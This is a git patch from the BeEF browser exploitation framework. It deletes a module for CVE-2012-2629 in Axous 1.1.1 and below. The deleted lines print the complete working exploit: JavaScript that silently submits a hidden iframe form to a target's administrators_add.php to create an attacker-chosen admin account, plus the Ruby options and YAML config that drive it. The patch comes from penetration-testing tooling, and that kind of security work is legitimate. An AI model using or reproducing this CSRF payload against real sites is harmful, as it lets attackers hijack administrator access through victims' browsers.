From 9a1eccd0669acff2ca9dff496107444981f2f71d Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Thu, 7 Apr 2016 14:03:07 +0000 Subject: [PATCH] Remove example module --- .../axous_1_1_1_add_user_csrf/command.js | 31 ------------------- .../axous_1_1_1_add_user_csrf/config.yaml | 15 --------- .../axous_1_1_1_add_user_csrf/module.rb | 21 ------------- 3 files changed, 67 deletions(-) delete mode 100644 modules/exploits/axous_1_1_1_add_user_csrf/command.js delete mode 100644 modules/exploits/axous_1_1_1_add_user_csrf/config.yaml delete mode 100644 modules/exploits/axous_1_1_1_add_user_csrf/module.rb diff --git a/modules/exploits/axous_1_1_1_add_user_csrf/command.js b/modules/exploits/axous_1_1_1_add_user_csrf/command.js deleted file mode 100644 index cd5142440..000000000 --- a/modules/exploits/axous_1_1_1_add_user_csrf/command.js +++ /dev/null @@ -1,31 +0,0 @@ -// -// Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net -// Browser Exploitation Framework (BeEF) - http://beefproject.com -// See the file 'doc/COPYING' for copying permission -// - -beef.execute(function() { - var base = '<%= @base %>'; - var username = '<%= @username %>'; - var password = '<%= @password %>'; - var email = '<%= @email %>'; - - var axous_iframe = beef.dom.createIframeXsrfForm(base, "POST", "application/x-www-form-urlencoded", [ - {'type':'hidden', 'name':'user_name', 'value':username}, - {'type':'hidden', 'name':'new_passwd', 'value':password}, - {'type':'hidden', 'name':'new_passwd1', 'value':password}, - {'type':'hidden', 'name':'email', 'value':email}, - {'type':'hidden', 'name':'dosubmit', 'value':'1'} , - {'type':'hidden', 'name':'id', 'value':''}, - {'type':'hidden', 'name':'action', 'value':'addnew'} , - ]); - - beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); - - cleanup = function() { - document.body.removeChild(axous_iframe); - } - setTimeout("cleanup()", 15000); - -}); - diff --git a/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml b/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml deleted file mode 100644 index 9adb77516..000000000 --- a/modules/exploits/axous_1_1_1_add_user_csrf/config.yaml +++ /dev/null @@ -1,15 +0,0 @@ -# -# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net -# Browser Exploitation Framework (BeEF) - http://beefproject.com -# See the file 'doc/COPYING' for copying permission -# -beef: - module: - axous_add_user_csrf: - enable: true - category: "Exploits" - name: "Axous <= 1.1.1 Add User CSRF" - description: "Attempts to add a user to an Axous <= 1.1.1 install (CVE-2012-2629)." - authors: ["bcoles", "Ivano Binetti"] - target: - unknown: ["ALL"] diff --git a/modules/exploits/axous_1_1_1_add_user_csrf/module.rb b/modules/exploits/axous_1_1_1_add_user_csrf/module.rb deleted file mode 100644 index adbe0853b..000000000 --- a/modules/exploits/axous_1_1_1_add_user_csrf/module.rb +++ /dev/null @@ -1,21 +0,0 @@ -# -# Copyright (c) 2006-2016 Wade Alcorn - wade@bindshell.net -# Browser Exploitation Framework (BeEF) - http://beefproject.com -# See the file 'doc/COPYING' for copying permission -# -class Axous_add_user_csrf < BeEF::Core::Command - - def self.options - return [ - { 'name' => 'base', 'ui_label' => 'Axous URL', 'value' => 'http://target/admin/administrators_add.php'}, - { 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username'}, - { 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password'}, - { 'name' => 'email', 'ui_label' => 'E-mail Address', 'value' => 'email@example.com'} - ] - end - - def post_execute - save({'result' => @datastore['result']}) - end - -end